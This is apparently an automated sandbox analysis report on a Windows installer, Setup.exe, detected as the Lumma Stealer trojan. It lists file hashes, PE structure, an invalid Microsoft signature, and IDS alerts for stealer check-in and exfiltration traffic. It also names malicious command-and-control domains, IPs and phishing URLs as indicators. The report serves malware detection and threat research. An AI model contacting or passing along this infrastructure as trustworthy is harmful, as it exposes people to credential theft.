Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Setup.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 27 Number of non-executed functions: 313
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
19:26:32	API Interceptor	8x Sleep call for process: Setup.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.6	236236236.elf	Get hash	malicious	Unknown	Browse	hollweghospitality.com/blog/wp-login.php
	BanK_copy.rtf	Get hash	malicious	Unknown	Browse	244-3-drvu.4everland.app/bankcopy.exe
	Purchase Order..exe	Get hash	malicious	FormBook	Browse	www.bser101pp.buzz/v89f/
	ibk0BQaWAo.exe	Get hash	malicious	Unknown	Browse	orbitdownloader.com/
	ibk0BQaWAo.exe	Get hash	malicious	Unknown	Browse	orbitdownloader.com/
	e6o7hKFmfC.exe	Get hash	malicious	FormBook	Browse	www.astrofrance.online/uem3/?BpE=hw9wdlgRPJgu6mhEw3v3abu2JdZhLnzfTKsoEzFZGCpKAu6wx+OREaAyoHMqAY/6AEPW&SH=IDKTKDM

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
wellofflyric.click	setup.exe	Get hash	malicious	LummaC	Browse	104.21.60.208

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	'Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.169.205
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.191.144
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.27.229
	installer.msi	Get hash	malicious	Unknown	Browse	104.21.80.93
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.58.45
	AutoUpdate.exe	Get hash	malicious	LummaC	Browse	172.67.169.205
	EPIRTURMEROOO0060.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	https://en.newsnowbangla.com/archives/69912	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	104.17.25.14
	https://u48917305.ct.sendgrid.net/ls/click?upn=u001.ztQPJiWtq2gO8V-2Ftd7SxY9UCAq3VScTPSloeIw5UEMPd6e3nbPRvJ98moPTqmrdQ1eNbvwZHJ-2BEb4HrooVFNCTltmXW6SgRONKSmPzdFoWfDQT97cczFZ0vj7M2xBd2izDTi-2BL-2BoVqB8yVzV2GW7vOPvy3s9yVghrOS5vs-2BSnWyzJMkXQxVEReq4oLCDet7QAOvo_JkpSD-2Bg6VoLAQppUKMb-2BxDh4v4nbOeQFT31aoN-2FLkhvFCzY6wdlGM7RTNIi47OKR1tTaghG8tTKssArDNPSXAfX9wO6nsZ2FHn-2FunyaOti-2FaII-2FnbKYDXJOImW-2Bs9f4tYnWj8rqO7L0kp4KNRHBDo0iHoL8DEOGc8GMtzqzsIqERel6-2FxJyY4DBnsnUTOc2I4HCPKA6lxcCEXMtxEA1-2FnQ-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	'Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.96.6
	setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.6
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.6
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.6
	AutoUpdate.exe	Get hash	malicious	LummaC	Browse	188.114.96.6
	Violated Heroine_91zbZ-1.exe	Get hash	malicious	Unknown	Browse	188.114.96.6
	xlSzrIs5h6.exe	Get hash	malicious	LummaC, Stealc	Browse	188.114.96.6
	ZysXVT72cl.exe	Get hash	malicious	LummaC	Browse	188.114.96.6
	NxqDwaYpbp.exe	Get hash	malicious	LummaC	Browse	188.114.96.6
	NAnOVCOt4L.exe	Get hash	malicious	LummaC	Browse	188.114.96.6

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	0.43826633413244787
TrID:	Win32 Executable (generic) a (10002005/4) 97.75% Windows ActiveX control (116523/4) 1.14% Inno Setup installer (109748/4) 1.07% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	Setup.exe
File size:	74'566'691 bytes
MD5:	894026775541f481a5fcdf15927a09b7
SHA1:	9491c5cb341b8218ec15fbbc38bf510e2fae8f23
SHA256:	a663f996634c13f46267d6b4a226680090ae71d392db03628094c881302e531c
SHA512:	fe4a24c73206435b3f22e22333f6de96291f141a8f2e27a0c68b4593708c7ca47f71294a6484e4d0d15645370a01798f7a70b8319848af5a96921121f25fd1f6
SSDEEP:	24576:wObekYk46ohrP337uzHnA6cgqpeEFHR9vZ8DEx9gFQ7hNCAXh4fLCrxIO:wO6ZXrP337uzHnA6cXnHvRxLHCfk
TLSH:	16F77D2DA6100EA59F7359ADE90796FDBD14910823119CFB61CE0ECF85EECFC423295A
File Content Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	fffeee412545c000

Static PE Info

General

Entrypoint:	0x497270
Entrypoint Section:	CODE
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	1
OS Version Minor:	0
File Version Major:	1
File Version Minor:	0
Subsystem Version Major:	1
Subsystem Version Minor:	0
Import Hash:	8c4dc1fd8c5de32c5f78cf7b057b0119

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	15/12/2020 21:24:20 02/12/2021 21:24:20
Subject Chain	CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:	3
Thumbprint MD5:	4068B1B0494EFA79F5A751DCCA8111CD
Thumbprint SHA-1:	914A09C2E02C696AF394048BCB8D95449BCD5B9E
Thumbprint SHA-256:	4A838904E732A380E2856A9D6FEE926E5C57EB59336292AC5D9E47C9B2C1ED13
Serial:	33000003DFFB6AE3F427ECB6A30000000003DF

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF4h
push ebx
push esi
push edi
call 00007F6E0875880Bh
call 00007F6E0875AB62h
call 00007F6E0875B7F1h
call 00007F6E0875EE0Ch
call 00007F6E0875F03Bh
call 00007F6E08765E12h
call 00007F6E08765E85h
call 00007F6E08767DDCh
call 00007F6E0876E4EFh
call 00007F6E0877A3EAh
call 00007F6E08784A11h
call 00007F6E08785CF8h
call 00007F6E087A4423h
call 00007F6E087A48C6h
call 00007F6E087A62E9h
call 00007F6E087A7CDCh
call 00007F6E087AB823h
call 00007F6E087AC722h
call 00007F6E087ADF5Dh
call 00007F6E087B9284h
call 00007F6E087C13CBh
call 00007F6E087CCC9Ah
call 00007F6E087D7951h
call 00007F6E087E966Ch
xor eax, eax
push ebp
push 0049732Fh
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
push 00000001h
call 00007F6E0875AEEBh
call 00007F6E087EC46Ah
mov eax, 00496FB0h
push eax
push 00496FBCh
mov eax, dword ptr [0049A628h]
call 00007F6E08779909h
call 00007F6E087EC498h
xor eax, eax
pop edx
pop ecx
pop ecx
mov dword ptr fs:[eax], edx
jmp 00007F6E087EC75Bh
jmp 00007F6E08758281h
call 00007F6E097EC2C4h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9c000	0x25a4	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xaa000	0x64800	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x471aa53	0x21d0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa1000	0x0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xa0000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x964b0	0x96600	2a0523de608b9681209879a7395f6db3	False	0.5010877753532834	data	6.615828374983338	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x98000	0x10ac	0x1200	a74ea1c5858a1006838feba85c7a8c8b	False	0.4407552083333333	data	4.338309579693486	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0x9a000	0x14ac	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x9c000	0x25a4	0x2600	ae6941eb6076de24634829aa5a7aa16f	False	0.38394325657894735	data	5.032369843350049	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x9f000	0x8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xa0000	0x18	0x200	93b7fd2e23d45a502cf114b2fa0c97c6	False	0.05078125	data	0.190488766434666	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0xa1000	0x88e8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0xaa000	0x64800	0x64800	a5d2da2bd8d3b73bdd3f3c73e140c48b	False	0.5837414490049752	data	7.45038385534612	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0xaac20	0x134	data			0.4805194805194805
RT_CURSOR	0xaad54	0x134	data			0.38311688311688313
RT_CURSOR	0xaae88	0x134	data			0.36038961038961037
RT_CURSOR	0xaafbc	0x134	data			0.4090909090909091
RT_CURSOR	0xab0f0	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"			0.4967532467532468
RT_CURSOR	0xab224	0x134	data			0.4642857142857143
RT_BITMAP	0xab358	0x4e8	Device independent bitmap graphic, 48 x 48 x 4, image size 1152			0.2945859872611465
RT_BITMAP	0xab840	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.521551724137931
RT_ICON	0xab928	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.11856846473029045
RT_ICON	0xaded0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.22889305816135083
RT_ICON	0xaef78	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.22295081967213115
RT_ICON	0xaf900	0x6b8	Device independent bitmap graphic, 20 x 40 x 32, image size 1680	English	United States	0.3325581395348837
RT_ICON	0xaffb8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.36879432624113473
RT_STRING	0xb0420	0x3a8	data			0.37393162393162394
RT_STRING	0xb07c8	0x348	data			0.3630952380952381
RT_STRING	0xb0b10	0x3ac	data			0.40425531914893614
RT_STRING	0xb0ebc	0x3e2	data			0.3822937625754527
RT_STRING	0xb12a0	0x234	data			0.5124113475177305
RT_STRING	0xb14d4	0x2da	data			0.46301369863013697
RT_STRING	0xb17b0	0x2fa	data			0.36351706036745407
RT_STRING	0xb1aac	0x202	data			0.4961089494163424
RT_STRING	0xb1cb0	0xc8	data			0.675
RT_STRING	0xb1d78	0x1ec	data			0.5060975609756098
RT_STRING	0xb1f64	0x27a	data			0.471608832807571
RT_STRING	0xb21e0	0x3aa	data			0.42643923240938164
RT_STRING	0xb258c	0x7e	data			0.6428571428571429
RT_STRING	0xb260c	0x36c	data			0.386986301369863
RT_STRING	0xb2978	0x2f2	data			0.35543766578249336
RT_STRING	0xb2c6c	0x30c	data			0.3871794871794872
RT_STRING	0xb2f78	0x2ce	data			0.42618384401114207
RT_STRING	0xb3248	0x68	data			0.75
RT_STRING	0xb32b0	0xb4	data			0.6277777777777778
RT_STRING	0xb3364	0xae	data			0.5344827586206896
RT_RCDATA	0xb3414	0x1800	PE32+ executable (console) x86-64, for MS Windows	English	United States	0.3826497395833333
RT_RCDATA	0xb4c14	0x1000	PE32 executable (GUI) Intel 80386, for MS Windows	English	United States	0.358642578125
RT_RCDATA	0xb5c14	0x5b10	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows	English	United States	0.3255404941660947
RT_RCDATA	0xbb724	0x125	Delphi compiled form 'TMainForm'			0.7508532423208191
RT_RCDATA	0xbb84c	0x3a2	Delphi compiled form 'TNewDiskForm'			0.524731182795699
RT_RCDATA	0xbbbf0	0x320	Delphi compiled form 'TSelectFolderForm'			0.53625
RT_RCDATA	0xbbf10	0x300	Delphi compiled form 'TSelectLanguageForm'			0.5703125
RT_RCDATA	0xbc210	0x5d9	Delphi compiled form 'TUninstallProgressForm'			0.4562458249832999
RT_RCDATA	0xbc7ec	0x461	Delphi compiled form 'TUninstSharedFileForm'			0.4335414808206958
RT_RCDATA	0xbcc50	0x1faf	Delphi compiled form 'TWizardForm'			0.23018123535938848
RT_GROUP_CURSOR	0xbec00	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0xbec14	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0xbec28	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0xbec3c	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0xbec50	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0xbec64	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_ICON	0xbec78	0x4c	data	English	United States	0.7894736842105263
RT_VERSION	0xbecc4	0x158	370 sysV pure executable not stripped	English	United States	0.561046511627907
RT_MANIFEST	0xbee1c	0x560	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4251453488372093

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll	MessageBoxA
oleaut32.dll	SafeArrayPutElement, SafeArrayCreate, VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll	RegSetValueExA, RegQueryValueExA, RegQueryInfoKeyA, RegOpenKeyExA, RegEnumValueA, RegEnumKeyExA, RegDeleteValueA, RegDeleteKeyA, RegCreateKeyExA, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
kernel32.dll	lstrcmpA, WriteProfileStringA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, VirtualFree, VirtualAlloc, UnmapViewOfFile, TransactNamedPipe, TerminateThread, TerminateProcess, Sleep, SizeofResource, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesA, SetErrorMode, SetEndOfFile, SetCurrentDirectoryA, RemoveDirectoryA, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileExA, MoveFileA, MapViewOfFile, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExA, LoadLibraryA, IsDBCSLeadByte, IsBadWritePtr, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetWindowsDirectoryA, GetVersionExA, GetVersion, GetUserDefaultLangID, GetTickCount, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryA, GetSystemDefaultLCID, GetShortPathNameA, GetProfileStringA, GetProcAddress, GetPrivateProfileStringA, GetOverlappedResult, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetDriveTypeA, GetDiskFreeSpaceA, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryA, GetComputerNameA, GetCommandLineA, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FlushFileBuffers, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, DeviceIoControl, DeleteFileA, CreateThread, CreateProcessA, CreateNamedPipeA, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CompareFileTime, CloseHandle
mpr.dll	WNetOpenEnumA, WNetGetUniversalNameA, WNetGetConnectionA, WNetEnumResourceA, WNetCloseEnum
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll	UnrealizeObject, TextOutA, StretchDIBits, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceA, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetCurrentPositionEx, GetClipBox, GetBitmapBits, ExtFloodFill, ExcludeClipRect, EnumFontsA, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateFontIndirectA, CreateDIBitmap, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceA
user32.dll	WindowFromPoint, WinHelpA, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowOwnedPopups, ShowCursor, SetWindowRgn, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetCapture, SetActiveWindow, SendNotifyMessageA, SendMessageTimeoutA, SendMessageW, SendMessageA, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClassA, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharBuffA, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRgn, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetSystemMetrics, GetSystemMenu, GetSysColor, GetSubMenu, GetScrollPos, GetPropA, GetParent, GetWindow, GetMessagePos, GetMessageA, GetMenuStringA, GetMenuState, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassInfoW, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, ExitWindowsEx, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableMenuItem, DrawTextW, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreateWindowExA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcW, CallWindowProcA, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuA, CharPrevA, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemBuffA, AdjustWindowRectEx
comctl32.dll	ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Create, InitCommonControls
ole32.dll	CoTaskMemFree, CLSIDFromProgID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
oleaut32.dll	GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
shell32.dll	ShellExecuteExA, ShellExecuteA, SHGetFileInfoA, ExtractIconA
shell32.dll	SHChangeNotify, SHBrowseForFolder, SHGetPathFromIDList, SHGetMalloc
comdlg32.dll	GetSaveFileNameA, GetOpenFileNameA
ole32.dll	CoDisconnectObject
advapi32.dll	AdjustTokenPrivileges

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-24T01:26:20.891357+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	188.114.96.6	443	TCP
2024-12-24T01:26:32.809139+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	188.114.96.6	443	TCP
2024-12-24T01:26:32.809139+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	188.114.96.6	443	TCP
2024-12-24T01:26:34.035084+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	188.114.96.6	443	TCP
2024-12-24T01:26:34.803614+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49736	188.114.96.6	443	TCP
2024-12-24T01:26:34.803614+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49736	188.114.96.6	443	TCP
2024-12-24T01:26:36.307707+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	188.114.96.6	443	TCP
2024-12-24T01:26:38.598523+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	188.114.96.6	443	TCP
2024-12-24T01:26:40.819229+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49740	188.114.96.6	443	TCP
2024-12-24T01:26:43.285119+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	188.114.96.6	443	TCP
2024-12-24T01:26:44.072373+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49741	188.114.96.6	443	TCP
2024-12-24T01:26:45.356692+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	188.114.96.6	443	TCP
2024-12-24T01:26:47.039099+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49743	188.114.96.6	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 01:26:19.550945997 CET	49730	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:19.550995111 CET	443	49730	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:19.551081896 CET	49730	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:19.553803921 CET	49730	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:19.553831100 CET	443	49730	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:20.891263008 CET	443	49730	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:20.891356945 CET	49730	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:20.894648075 CET	49730	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:20.894658089 CET	443	49730	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:20.895255089 CET	443	49730	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:20.942176104 CET	49730	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:20.942176104 CET	49730	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:20.942305088 CET	443	49730	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:32.809113026 CET	443	49730	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:32.809201956 CET	443	49730	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:32.809293985 CET	49730	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:32.811532974 CET	49730	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:32.811548948 CET	443	49730	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:32.811892033 CET	49730	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:32.811897039 CET	443	49730	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:32.820892096 CET	49736	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:32.820943117 CET	443	49736	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:32.821208000 CET	49736	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:32.822213888 CET	49736	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:32.822231054 CET	443	49736	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:34.034986019 CET	443	49736	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:34.035084009 CET	49736	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:34.036122084 CET	49736	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:34.036138058 CET	443	49736	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:34.036344051 CET	443	49736	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:34.045561075 CET	49736	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:34.045587063 CET	49736	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:34.045634031 CET	443	49736	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:34.803620100 CET	443	49736	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:34.803663969 CET	443	49736	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:34.803711891 CET	49736	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:34.803726912 CET	443	49736	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:34.804039955 CET	443	49736	188.114.96.6	192.168.2.4
